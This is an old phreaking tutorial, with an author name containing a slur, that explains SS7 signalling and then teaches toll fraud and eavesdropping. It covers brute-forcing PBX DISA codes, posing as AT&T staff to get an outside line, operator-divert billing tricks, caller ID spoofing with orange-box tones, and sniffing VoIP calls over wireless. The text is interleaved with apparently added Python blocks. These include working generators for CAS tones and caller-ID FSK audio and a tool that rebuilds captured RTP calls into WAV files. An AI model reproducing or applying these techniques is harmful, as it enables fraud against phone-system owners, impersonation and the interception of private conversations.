Phreak 2k

by protonigger


NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

Section 1: The Introduction

The lack of recent information about phreaking on the internet has been a real problem lately, and it has led many to believe that phreaking itself is dead. Of course this is untrue. So in writing this tutorial I am giving you, the reader, the chance to try out phreaking as it is today. Enjoy...

Section 2: Understanding How It All Works

One of my favorite lines when explaining such topics is that you cannot expect to break into something, or take advantage of it, without first understanding how it operates. So to start off this tutorial I think it is best to review how the telco operates. Welcome to the world of SS7 (Signaling System 7). SS7 is an architecture for performing out-of-band signaling in support of the functions of the PSTN (public switched telephone network): call establishment, billing, routing, and information exchange. It identifies the functions to be performed by a signaling network and provides a protocol to perform them.

When I speak of out-of-band signaling, I am referring to signaling that takes place on a separate path from the one the conversation is using. SS7 establishes a separate digital channel for the exchange of signaling information, called a signaling link. When a call is placed, the necessary signaling messages (dialed digits, selected trunk, etc.) are sent between switches over their signaling links rather than over the trunks that carry the conversation. SS7 itself deals with signaling between network elements; the same idea is extended to the subscriber with ISDN, where the information that makes up the call is carried over B channels while the signaling is carried over a D channel. This makes the whole process more robust, because signaling information can be exchanged for the entire duration of the call instead of only at the beginning.

Now let's get into the structure of an SS7 network. The simplest design for the signaling network architecture is called associated signaling. It works by allocating one of the paths between each interconnected pair of switches as the signaling link.
That architecture works efficiently as long as a switch's only signaling requirements are between itself and the other switches it has trunks to, and it is the architecture you will find implemented in Europe. The USA, however, wanted a signaling network that would let any node exchange signaling with any other SS7-capable node. That is more complicated, since signaling must then be exchanged between nodes that have no direct connection, and it spawned the North American SS7 architecture, under which a completely separate signaling network is defined.

The network is built from three essential components, connected by signaling links. The first is the service switching point (SSP): a telephone switch (end office or tandem) equipped with SS7-capable software and terminating signaling links. SSPs originate, terminate, or switch calls. The next is the signal transfer point (STP), the packet switch of the SS7 network. STPs receive incoming signaling messages, route them toward the proper destination, and perform specialized routing functions. Finally there is the service control point (SCP), a database that provides the information needed for advanced call-processing capabilities.

Now let's look at the link types used in SS7. A links (the A stands for access) interconnect an STP with either an SSP or an SCP, so A links carry signaling to and from signaling end points. An SSP is connected to its home STP pair by a set of A links; for reliability, an additional set of links may be deployed to a second STP pair. These are called E links (E for extended), and they provide backup connectivity in the event that the home STPs cannot be reached over the A links.
C links (C for cross) interconnect the two STPs of a mated pair; they too provide reliability when other links are unavailable. Carrying signaling messages beyond the initial entry point into the signaling network, on toward their intended destination, is handled by B and D links. B (bridge) links interconnect peer pairs of STPs, while D (diagonal) links form the quad of links interconnecting mated pairs of STPs at different levels of the hierarchy. Finally, F (fully associated) links directly connect two signaling end points; because F links bypass the security features an STP provides, they are generally not deployed between networks.

Now that we understand the link types, we can discuss what actually goes over a signaling link. Signaling information is transferred in messages called signal units (SUs). The SS7 protocol defines three types: message signal units (MSUs), link status signal units (LSSUs), and fill-in signal units (FISUs). SUs are transmitted continuously in both directions on any in-service link. A signaling point that has no MSUs or LSSUs to send transmits FISUs (in other words, for those of you scratching your heads, whenever a signaling point has nothing to say it sends FISUs, which simply fill the signaling link until it is needed for other signaling).

Now let's take all this SS7 networking and discuss the layers that make up the protocol. The lowest layer is the physical layer, MTP Level 1, which defines the physical and electrical characteristics of the signaling links.
Above that is the rest of the MTP (message transfer part). MTP Level 2 provides the link-layer functionality that ensures messages can be sent reliably across a signaling link, and MTP Level 3 extends Level 2 with network-layer functionality, routing messages between signaling points. Another layer is SCCP (signaling connection control part), which allows addressing of applications within a signaling point. These applications are referred to as subsystems and include 800 call processing, calling-card processing, CLASS (custom local area signaling services) features such as call return, and so on. SCCP also provides GTT (global title translation), which makes incremental routing possible: an originating signaling point does not have to know every potential routing destination, only a node that can translate the address further. Next is ISUP (ISDN user part), which defines the messages and protocol used to set up and tear down calls over the PSN (public switched network). In the North American SS7 architecture, ISUP messages rely exclusively on MTP for transport between nodes. Then there is TCAP (transaction capabilities application part), which defines the messages and protocol used to communicate between subsystems; TCAP therefore uses SCCP for transport. Finally, OMAP (operations, maintenance, and administration part) defines messages and procedures designed to assist administrators of the SS7 network; OMAP uses both MTP and SCCP for routing.

Now that we understand the layers that make up SS7, let's discuss the addressing scheme. Individual signaling points on an SS7 network are assigned to a cluster, or group of signaling points, and within that cluster each signaling point is assigned a member number. In the North American architecture, each node is addressed by a three-level address called a point code.
The point code is made up of network, cluster, and member numbers. Each is an 8-bit number ranging from 0 to 255 (sound familiar?). Network numbers are assigned nationwide by a neutral party; RBOCs (regional Bell operating companies), major independent telephone companies, and IXCs (interexchange carriers) already have network numbers assigned. The cluster a node belongs to is based on the state in which the node resides. And, as with other network addressing schemes, network number 0 is not available for assignment and 255 is reserved for future use.

That pretty much wraps up my explanation of SS7. If you have reached the end of this section utterly confused, feel free to read it again until it makes sense; it is important to understand how the PSTN works. Note also that not every area of the globe has SS7 in its switching system, but outside the least developed networks it is almost certainly what is in use.
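As an added illustration, not part of the original article, here is a small Python parser for the two things this section has just described: the three kinds of signal unit and the North American point code. It classifies a unit from the length indicator in its MTP Level 2 header and, for an MSU, decodes the service indicator and the ANSI routing label (DPC, OPC, SLS), rendering the 24-bit point codes in the network-cluster-member form. The sample units are constructed for the example; that the flags and CRC have already been stripped and that a point code is sent member octet first are assumptions stated in the comments.

```python
"""Parse SS7 MTP2 signal units and ANSI (North American) MTP3 routing labels.

Added example, not part of the original text.  Assumptions, restated here so
the code is self-contained:
  * the opening/closing flags and the 16-bit CRC have already been stripped,
    so raw[0] is the BSN/BIB octet;
  * a 24-bit ANSI point code is sent least-significant octet first, i.e. in
    member, cluster, network order.
"""

LSSU_STATUS = {0: "SIO", 1: "SIN", 2: "SIE", 3: "SIOS", 4: "SIPO", 5: "SIB"}
SERVICE_INDICATOR = {0: "SNM", 1: "SNT", 3: "SCCP", 5: "ISUP"}
NETWORK_INDICATOR = {0: "international", 2: "national"}


def parse_point_code(text):
    """'net-cluster-member' -> (net, cluster, member); each field is 8 bits and,
    as the text says, network 0 is unassignable and 255 is reserved."""
    parts = text.split("-")
    if len(parts) != 3:
        raise ValueError("point code must be net-cluster-member")
    net, cluster, member = (int(p) for p in parts)
    for v in (net, cluster, member):
        if not 0 <= v <= 255:
            raise ValueError("each point code field is 8 bits (0..255)")
    if net in (0, 255):
        raise ValueError("network id 0 is unassigned and 255 is reserved")
    return net, cluster, member


def point_code_to_int(text):
    """The same point code as the 24-bit integer carried in the routing label."""
    net, cluster, member = parse_point_code(text)
    return (net << 16) | (cluster << 8) | member


def point_code_from_octets(octets):
    """Three wire octets (member, cluster, network) -> 'net-cluster-member'."""
    member, cluster, net = octets
    return f"{net}-{cluster}-{member}"


def parse_su(raw):
    """Classify a signal unit by its length indicator and decode its contents."""
    if len(raw) < 3:
        raise ValueError("signal unit too short")
    su = {
        "bsn": raw[0] & 0x7F, "bib": raw[0] >> 7,
        "fsn": raw[1] & 0x7F, "fib": raw[1] >> 7,
        "li": raw[2] & 0x3F,
    }
    li = su["li"]
    if li == 0:                       # nothing to say: link filler
        su["type"] = "FISU"
    elif li in (1, 2):                # link status (alignment, outage, busy)
        su["type"] = "LSSU"
        su["status"] = LSSU_STATUS.get(raw[3] & 0x07, "unknown")
    else:                             # a real message: SIO then SIF follow
        su["type"] = "MSU"
        sio = raw[3]
        su["service"] = SERVICE_INDICATOR.get(sio & 0x0F, f"SI{sio & 0x0F}")
        su["network_indicator"] = NETWORK_INDICATOR.get(sio >> 6, "reserved")
        sif = raw[4:]
        if len(sif) < 7:
            raise ValueError("ANSI routing label needs 7 octets")
        su["dpc"] = point_code_from_octets(sif[0:3])
        su["opc"] = point_code_from_octets(sif[3:6])
        su["sls"] = sif[6]
        su["payload"] = bytes(sif[7:])
    return su


def build_msu(dpc, opc, sls, si, payload, ni=2):
    """Inverse of parse_su for an MSU; used here only to construct sample input."""
    label = b""
    for pc in (dpc, opc):
        net, cluster, member = parse_point_code(pc)
        label += bytes([member, cluster, net])
    sio = (ni << 6) | (si & 0x0F)
    body = bytes([sio]) + label + bytes([sls]) + payload
    li = min(len(body), 63)           # LI saturates at 63 on the wire
    return bytes([0x00, 0x00, li]) + body


# Constructed samples: an ISUP IAM (CIC 1, message type 0x01) from 250-4-7
# to 1-2-3, a fill-in unit, and an "out of service" link status unit.
SAMPLE_MSU = build_msu("1-2-3", "250-4-7", 12, 5, bytes([0x01, 0x00, 0x01]))
SAMPLE_FISU = bytes([0x81, 0x02, 0x00])
SAMPLE_LSSU = bytes([0x81, 0x02, 0x01, 0x03])

if __name__ == "__main__":
    for name, su in (("MSU", SAMPLE_MSU), ("FISU", SAMPLE_FISU), ("LSSU", SAMPLE_LSSU)):
        print(name, parse_su(su))
```

Run it and the MSU decodes to service ISUP, national network indicator, DPC 1-2-3 and OPC 250-4-7; feed it a point code with network 0 and parse_point_code refuses it, which is the check an operator's provisioning script would want.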

Section 3: Understanding How To Make It Work For You

Now that we understand how the PSTN works, let's get to the fun part. I clearly cannot cover every area, aspect, and technique used in phreaking; I am merely going to describe a few activities you can try, as a beginner, to get your feet wet.

One activity worthy of a brief mention is handscanning. It is preferable to wardialing because, if properly done, it is a tad less obvious, and it can pick up a few treasures your average wardialer misses. To handscan you start with a prefix (the three digits in the middle of a phone number; in 555-xxx-5555 the x's are the prefix). Do not search incrementally (dialing -0001, -0002, -0003, and so on); choose a more random order, which makes the activity less obvious. If you have the patience (and you will need it), there are a lot of treasures to be found: backdoors and VMBs (voice mail boxes), to name a few. Since articles have already been written on what to do after finding such things, I will not get into that here; instead I link to them at the end of this tutorial so you can educate yourself further (hint: when choosing a prefix you aren't sure about, dial 1-800-xxx, the x's being the prefix, and wait. If you get tones, choose another prefix).

Now let's discuss PBXs (Private Branch eXchanges). A PBX is, simply put, a private phone switch used to provide an internal phone system. Remember in high school when you had to press 9 before dialing out? That is because the school used a PBX, and 9 was the access code that told the PBX to give you an outside line.
Such an internal phone system consists of a small phone switch, a group of outbound trunks (which are nothing more than phone lines to the outside), a set of telephones, and a bunch of users. So how is it useful to us? We can use the PBX's dialout to seize an outbound trunk and make all the calls we want at the PBX owner's expense. The best part is that it is a relatively simple task: you go through the DISA port. DISA (Direct Inward System Access) is a PBX feature that lets an outside caller dial in, enter an authorization code, and then use the system as if they were at an internal extension, including dialing out on one of the trunks. Connect to the DISA number, enter the pass code, and there you go: you have just seized an outbound trunk of that PBX. This is not as hard as it sounds. The codes are four to six digits long, usually four, and are usually something like 0000, 1111, or 1234. There is a tool that is apparently supposed to help with this task; I haven't tried it myself, but I include a link to it at the end of this tutorial.

There is another option if breaking DISA codes seems like too much work. Simply call the number of the PBX you want to use and ask to be put through to extension 90. If they ask why, say you work for AT&T and need to test the lines. This usually works and will let you dial out from the PBX (since 9 is the outside-line access code and 0 gets the operator).

While we are on the subject of free long distance calls, let's get into the new wave of such activities: ANI (Automatic Number Identification) spoofing. ANI is a service by which the directory/equipment number of the calling station is obtained. ANI is often used interchangeably with ANAC by those who don't know any better (consult Google for more on how ANI operates).
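Returning to the DISA codes described above: a PBX administrator can turn the warning about 0000, 1111 and 1234 into a check. The following Python audit is an added example, not code from the original article or from the linked tool; the code list it runs over is constructed, the weak-pattern rules are my own, and the lockout policy in minutes_to_exhaust is an assumed parameter rather than any particular PBX's behaviour.

```python
"""Audit DISA authorization codes for the guessable patterns the text warns about.

Added example, not part of the original text.  SAMPLE_CODES is constructed;
a real PBX would export its own list.
"""
import re

KEYPAD_ROWS = ("123", "456", "789")
KEYPAD_COLS = ("147", "258", "369", "2580", "0852")
COMMON_DEFAULTS = {"0000", "1111", "1234", "4321", "9999", "1212", "2580", "0852"}


def _is_sequential(code):
    """1234 / 4321 style: every step is +1 or every step is -1."""
    steps = {int(b) - int(a) for a, b in zip(code, code[1:])}
    return steps in ({1}, {-1})


def weak_code_reasons(code):
    """Return the list of reasons a code is guessable (empty means none found)."""
    if not re.fullmatch(r"\d{4,6}", code):
        return ["not 4-6 digits"]
    reasons = []
    if len(set(code)) == 1:
        reasons.append("repeated digit")
    if _is_sequential(code):
        reasons.append("sequential")
    if code == code[::-1]:
        reasons.append("palindrome")
    if len(code) == 4 and 1900 <= int(code) <= 2099:
        reasons.append("looks like a year")
    if code in COMMON_DEFAULTS:
        reasons.append("common default")
    if any(code in (p, p[::-1]) for p in KEYPAD_ROWS + KEYPAD_COLS):
        reasons.append("keypad pattern")
    if len(code) == 4:
        reasons.append("only 10^4 combinations")
    return reasons


def audit(codes):
    """Map each configured code to its list of weaknesses."""
    return {c: weak_code_reasons(c) for c in codes}


def minutes_to_exhaust(length, attempts_per_minute, lockout_after=None, lockout_minutes=0):
    """Worst-case time to try every code of the given length at a steady rate.
    lockout_after/lockout_minutes model an assumed "N failures, then lock for
    M minutes" policy; the text describes no particular PBX's behaviour."""
    total = 10 ** length
    minutes = total / attempts_per_minute
    if lockout_after:
        minutes += (total // lockout_after) * lockout_minutes
    return minutes


# Constructed sample: what an exported DISA code table might contain.
SAMPLE_CODES = ["0000", "1234", "2580", "1987", "7391", "482915"]

if __name__ == "__main__":
    for code, reasons in audit(SAMPLE_CODES).items():
        print(code, "->", ", ".join(reasons) or "ok")
    print("4 digits, 10/min, no lockout:", minutes_to_exhaust(4, 10), "minutes")
    print("6 digits, 10/min, lock 15 min after 3:",
          minutes_to_exhaust(6, 10, lockout_after=3, lockout_minutes=15), "minutes")
```

The point the numbers make is the one the text implies: a four-digit code with no lockout falls in under a day of patient dialing, and only a longer code plus a lockout moves the attacker's cost into months.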
An ANAC (Automatic Number Announcement Circuit) is a number you call that reads back the number you are calling from; linemen and phreaks both use them for that purpose. There is also ANI II, an extension of ANI that adds a pair of digits to the ANI readout telling what type of line or service the call originated from.

So how do we spoof ANI? One rather easy way is op diverting (having an operator dial a number for you), which works because most operator centers are not equipped to forward ANI. This is mostly a social engineering feat. As of the release of this text, the tactic no longer works on AT&T via 800-CALL-ATT, but there are many other ways of accomplishing it that still work. An example of op diverting that I believe still works is the 710 trick made popular by Lucky225 (as was the whole technique of ANI/caller ID spoofing). You perform it by op diverting to 800-673-7286 and telling the operator you want to place a call from a number in the 710 area code and bill it collect. The called party will not be billed, because the 710 area code does not exist in the AT&T database. There are also certain call forwarding services you can use to op divert; a link to one is provided at the end of this tutorial.

Since we have discussed ANI spoofing, we might as well get into caller ID spoofing. If you have call waiting caller ID, you will notice that you hear two tones when a second call comes in. The first is the SAS (Subscriber Alert Signal, also known as the "call waiting beep"), and the second is the CAS (Customer Premises Equipment [CPE] Alert Signal). The SAS is just the normal call waiting beep, while the CAS is a tone that alerts the CPE (your caller ID box) that a call waiting call has arrived.
The CPE then mutes the handset and sends an acknowledgement DTMF tone to the central office, telling the CO that it is OK to send the caller ID information. The CO then sends the information as an FSK transmission, the name and number are displayed on the CPE, and the handset is unmuted.

Now that we understand how the device works, we can discuss how the signal can be spoofed. To do this manually, which we discuss purely for educational purposes (you will understand why in a minute), you need a recording of an FSK transmission. First order caller ID on your line, then call that line while it is in use but without any caller ID device attached to the phone. You will hear the CAS, the acknowledgement DTMF ("A" or "D") that a CPE sends back to the CO, and the FSK transmission the CO sends in response. Record all of this on a microrecorder. Once you have the FSK recorded, call the number you want to reach, play the CAS signal, wait for his or her CPE to respond with the DTMF acknowledgement, and then play the FSK transmission. The CPE will display whatever you sent.

You can build an orange box (a CAS tone generator) by modifying a tone dialer: take out the 3.58 MHz crystal and replace it with an 8.192 MHz crystal, and pressing * will then generate the CAS tone pair. You can also generate the DTMF tones with a silver box (plans are linked at the end of this tutorial). The reason I said this is for the sake of education is that there is already software that generates these tones on your computer; a link to an orange boxing application is, as with many things, at the end of this tutorial.
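The CAS/DTMF/FSK exchange just described can be spelled out in code. The following Python is an added example, not code from the original article or from the orange-box program linked below; it encodes and checksums an MDMF caller ID message, frames it into Bell 202 FSK (1200 baud, 1200 Hz mark, 2200 Hz space), generates the 2130/2750 Hz CAS pair, and shows what the crystal swap in the orange box does to the * key. The caller ID values, the 80 ms CAS duration and the 80-bit mark lead-in are assumptions for the example, and decode_mdmf is the check a CPE performs on the receiving end.

```python
"""Type II (call waiting) caller ID signalling as described in the text:
CAS tone pair, then a Bell 202 FSK burst carrying an MDMF message.

Added example, not part of the original text or of the linked orange-box
program.  Tone frequencies are the standard Bell 202 / CAS values; the 80 ms
CAS duration, the 80 mark bits of lead-in and the sample values are
assumptions for the example.
"""
import math
import struct
import wave

MARK_HZ, SPACE_HZ, BAUD = 1200, 2200, 1200   # Bell 202: mark = 1, space = 0
CAS_HZ = (2130.0, 2750.0)                    # CPE Alert Signal tone pair
SAMPLE_RATE = 8000
PARAM_NAMES = {0x01: "datetime", 0x02: "number", 0x07: "name"}


def build_mdmf(number, name, mmddhhmm):
    """Encode an MDMF caller ID message: 0x80, length, TLV params, checksum."""
    params = bytes([0x01, 8]) + mmddhhmm.encode("ascii")
    params += bytes([0x02, len(number)]) + number.encode("ascii")
    params += bytes([0x07, len(name)]) + name.encode("ascii")
    body = bytes([0x80, len(params)]) + params
    return body + bytes([(-sum(body)) & 0xFF])   # two's complement of the byte sum


def decode_mdmf(msg):
    """Parse and checksum-verify an MDMF message, as the CPE does before displaying."""
    if len(msg) < 3 or msg[0] != 0x80:
        raise ValueError("not an MDMF message")
    if sum(msg) & 0xFF:
        raise ValueError("checksum mismatch")
    if msg[1] != len(msg) - 3:
        raise ValueError("length field disagrees with message size")
    fields, i = {}, 2
    while i < 2 + msg[1]:
        ptype, plen = msg[i], msg[i + 1]
        fields[PARAM_NAMES.get(ptype, ptype)] = msg[i + 2:i + 2 + plen].decode("ascii")
        i += 2 + plen
    return fields


def mdmf_bits(msg, mark_lead=80):
    """Serial framing: mark lead-in, then per byte 1 start bit, 8 data bits
    LSB first, 1 stop bit."""
    bits = [1] * mark_lead
    for byte in msg:
        bits.append(0)
        bits.extend((byte >> k) & 1 for k in range(8))
        bits.append(1)
    return bits


def fsk_samples(bits, rate=SAMPLE_RATE):
    """Phase-continuous FSK at 1200 baud, one float sample in [-0.5, 0.5] each."""
    out, phase = [], 0.0
    for n in range(int(len(bits) * rate / BAUD)):
        bit = bits[min(n * BAUD // rate, len(bits) - 1)]
        phase += 2 * math.pi * (MARK_HZ if bit else SPACE_HZ) / rate
        out.append(0.5 * math.sin(phase))
    return out


def cas_samples(duration=0.08, rate=SAMPLE_RATE):
    """The dual-tone CAS burst that makes a CPE mute the handset and send its ACK."""
    return [0.25 * sum(math.sin(2 * math.pi * f * n / rate) for f in CAS_HZ)
            for n in range(int(duration * rate))]


def scaled_dtmf(row_hz, col_hz, old_crystal_hz=3.579545e6, new_crystal_hz=8.192e6):
    """What the orange-box crystal swap does to a DTMF pair: every tone is
    multiplied by the crystal ratio, so the * key (941/1209 Hz) lands near CAS."""
    k = new_crystal_hz / old_crystal_hz
    return row_hz * k, col_hz * k


def write_wav(path, samples, rate=SAMPLE_RATE):
    """Write mono 16-bit PCM so the tones can be played or fed to a decoder."""
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(b"".join(struct.pack("<h", int(s * 32767)) for s in samples))


if __name__ == "__main__":
    msg = build_mdmf("5551234567", "JULIE", "12251030")   # constructed sample values
    print(decode_mdmf(msg))
    print("* key after crystal swap:", scaled_dtmf(941, 1209))
    write_wav("cas.wav", cas_samples())
    write_wav("cid_fsk.wav", fsk_samples(mdmf_bits(msg)))
```

Two things worth noticing: the checksum is a plain byte sum, so nothing in the format authenticates who sent it, which is exactly why a played-back recording is accepted; and the crystal arithmetic gives roughly 2154/2767 Hz, within the tolerance a CPE accepts for 2130/2750, which is why the dialer trick works.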
I was going to carry this section further by explaining payphones and what you can do with them nowadays, but I feel it is best to wrap up here and point you to the links section for information you can use to further your knowledge of such concepts. So this wraps up Understanding How to Make It Work For You. I have hopefully given you some techniques and concepts to start off with; it will be up to you to keep learning and exploring, and I wish you the best of luck.

Section 4: VoIP

I decided to include a section on VoIP (Voice over Internet Protocol), since VoIP is coming to be seen as a promising new technology, is beginning to be deployed on phone networks, and has shown itself to be quite flawed. In this section I explain VoIP so that you will have a better understanding of it should you attempt to exploit it. Two signaling protocols are in use for VoIP: H.323 and SIP (Session Initiation Protocol). H.323 is a complex suite of protocols that provides specifications for real-time, interactive videoconferencing, data sharing, and audio applications such as IP telephony. Go to http://protocols.com/pbook/h323.htm for more detail on the protocols within H.323. SIP, on the other hand, is a more streamlined protocol developed specifically for IP telephony. SIP is smaller and more efficient, and takes advantage of existing protocols for parts of the job: SDP describes the media session and RTP carries the audio itself. MGCP (Media Gateway Control Protocol) is a separate protocol used to control the media gateways that connect an IP network to the PSTN; a SIP-based softswitch may drive such a gateway with it, but SIP does not use MGCP itself. Again I will leave it to the people at protocols.com to explain the specifics of SIP: see http://www.protocols.com/pbook/VoIPFamily.htm#SIP. If you have read both links, you have a pretty good understanding of how VoIP operates.

Now let's discuss weaknesses in VoIP that we can use to our advantage. Thanks to the wondrous world of wireless technology, we can use a tool like tcpdump to attach to a wireless network and sniff VoIP traffic. We would then use a tool like VOMIT (Voice Over Misconfigured Internet Telephony) to reassemble that traffic into a WAV file, and thereby listen in on a conversation taking place over the network. Note that this only works when the traffic is actually readable: VOMIT reassembles unencrypted G.711 audio from Cisco IP phone conversations captured with tcpdump, so an encrypted wireless network, or an encrypted media stream such as SRTP, defeats it.
We can also perform a DNS hijack to redirect the traffic to a server we control and do the same thing there. As you can see, when VoIP becomes the norm, you will be able to use wardriving to listen in on VoIP users. This makes invading others' privacy very fun. Of course, we are not yet at the point where VoIP is widely used, but we can look toward tomorrow for such activities.
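What VOMIT does with such a capture can be shown in a few dozen lines. The Python below is an added example, not code from the original article or from VOMIT: it parses RTP headers, keeps one stream's G.711 mu-law packets, orders them by sequence number, pads a lost frame with silence, and decodes to 16-bit PCM for a WAV file. The capture is constructed inline (an out-of-order packet, a lost one, and a packet from another SSRC that must be ignored); real input would be the UDP payloads pulled out of a tcpdump or pcap file, and sequence-number wraparound is deliberately not handled.

```python
"""Reassemble a G.711 mu-law RTP stream into PCM, the job VOMIT does for a
captured Cisco call.  Added example, not part of the original text or of
VOMIT.  SAMPLE_CAPTURE is constructed below; real input would be the UDP
payloads from a tcpdump/pcap capture.  Sequence wraparound at 65535 is not
handled, to keep the example short.
"""
import struct
import wave

RTP_HEADER = struct.Struct(">BBHII")   # V/P/X/CC, M/PT, seq, timestamp, SSRC
PT_PCMU = 0                             # static payload type for G.711 mu-law


def parse_rtp(datagram):
    """Decode the fixed RTP header, skipping CSRCs, an extension and padding."""
    if len(datagram) < RTP_HEADER.size:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = RTP_HEADER.unpack_from(datagram)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    hdr_len = RTP_HEADER.size + 4 * (b0 & 0x0F)
    if b0 & 0x10:                                   # extension header present
        ext_words = struct.unpack_from(">H", datagram, hdr_len + 2)[0]
        hdr_len += 4 + 4 * ext_words
    payload = datagram[hdr_len:]
    if b0 & 0x20 and payload and payload[-1]:       # padding: last byte is its length
        payload = payload[:-payload[-1]]
    return {"pt": b1 & 0x7F, "marker": b1 >> 7, "seq": seq, "ts": ts,
            "ssrc": ssrc, "payload": payload}


def ulaw_to_linear(u):
    """G.711 mu-law byte -> 16-bit linear sample (0xFF is digital silence)."""
    u = ~u & 0xFF
    sign, exponent, mantissa = u & 0x80, (u >> 4) & 0x07, u & 0x0F
    sample = (((mantissa << 3) + 0x84) << exponent) - 0x84
    return -sample if sign else sample


def reassemble(datagrams, ssrc=None, frame_len=160):
    """Order one stream's PCMU packets by sequence number, pad losses with
    mu-law silence, drop duplicates, and return the concatenated mu-law bytes."""
    pkts = [p for p in map(parse_rtp, datagrams) if p["pt"] == PT_PCMU]
    if ssrc is None and pkts:
        ssrc = pkts[0]["ssrc"]
    pkts = sorted((p for p in pkts if p["ssrc"] == ssrc), key=lambda p: p["seq"])
    out, expected = bytearray(), None
    for p in pkts:
        if expected is not None:
            if p["seq"] < expected:                 # duplicate or already replaced
                continue
            out += b"\xff" * (frame_len * (p["seq"] - expected))   # fill the gap
        out += p["payload"]
        expected = p["seq"] + 1
    return bytes(out)


def to_wav(path, ulaw, rate=8000):
    """Decode mu-law to 16-bit PCM and write a mono WAV a sound player can open."""
    pcm = b"".join(struct.pack("<h", ulaw_to_linear(b)) for b in ulaw)
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(pcm)


def make_rtp(seq, ts, payload, pt=PT_PCMU, ssrc=0x1234ABCD, marker=0):
    """Build a packet; used here only to construct the sample capture."""
    return RTP_HEADER.pack(0x80, (marker << 7) | pt, seq, ts, ssrc) + payload


# Constructed capture: 20 ms frames, one arrives out of order, seq 13 is lost,
# and one packet belongs to a different stream (SSRC) and must be ignored.
SAMPLE_CAPTURE = [
    make_rtp(10, 1600, bytes([0x10]) * 160, marker=1),
    make_rtp(12, 1920, bytes([0x12]) * 160),
    make_rtp(11, 1760, bytes([0x11]) * 160),
    make_rtp(14, 2240, bytes([0x14]) * 160),
    make_rtp(5, 800, bytes([0x55]) * 160, ssrc=0x0BADF00D),
]

if __name__ == "__main__":
    stream = reassemble(SAMPLE_CAPTURE)
    print(len(stream), "mu-law bytes,", stream.count(0xFF), "bytes padded for loss")
    to_wav("call.wav", stream)
```

The defensive reading of the same code is that nothing in it needs a key: if the RTP payload were SRTP, the mu-law decode would produce noise, which is the one-line reason to insist on SRTP (and an encrypted WLAN) wherever phones share a network with untrusted hosts.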

Section 5: Conclusion

I hope you all enjoy reading this as much as I enjoyed writing it. Hopefully this tutorial will get some of you out there interested in phreaking, and will help educate those who are already interested, but don't know how to start. So good luck, and happy phreaking.

Section 6: Links

www.totse.com/en/phreak/vmb_pagers_e_mail/hackvmb.html - a rather old tutorial on breaking VMBs, but it's pretty much the same concept.

www.artofhacking.com/orange.html - a program you can use to generate CAS tones

www.totse.com/en/phreak/boxes_old_and_new/silver02.html - Silver Box plans

www.phreak.org - a decent phreak site

www.phonelosers.org - another good phreak site

www.verizonfears.com - Lucky225's site

http://thc.pimmel.com/files/thc/thc-ph11.zip - the PBX tool previously mentioned

http://artofhacking.com/boxrvw1.htm - offers ratings of skill, risk, plausibility, and obsolescence. Good for those of you who want to know which boxes can and can't still be used...

http://cal.phonelosers.org/cgi-bin/index.cgi?action=viewnews&id=46 - a nice article that gets into how your modern payphone operates, and weaknesses within such a payphone.

www.packetsurge.com - just because we 0wn! =)

www.cyberphaze.net - couldn't forget about these guys.

(the last two links are purely promotional, but make sure to visit them, they're very good sites with lots of information that you may find useful)

Note: I'd like to give recognition to Hallakaust for giving me the information on the *90 trick, and for notifying me of the tool listed above. As well as Stephen K. Gielda.

Note again: For those of you who have any questions or comments and feel the need to reach me you can do so at [email protected]

(p.s: Love ya Julie!)

 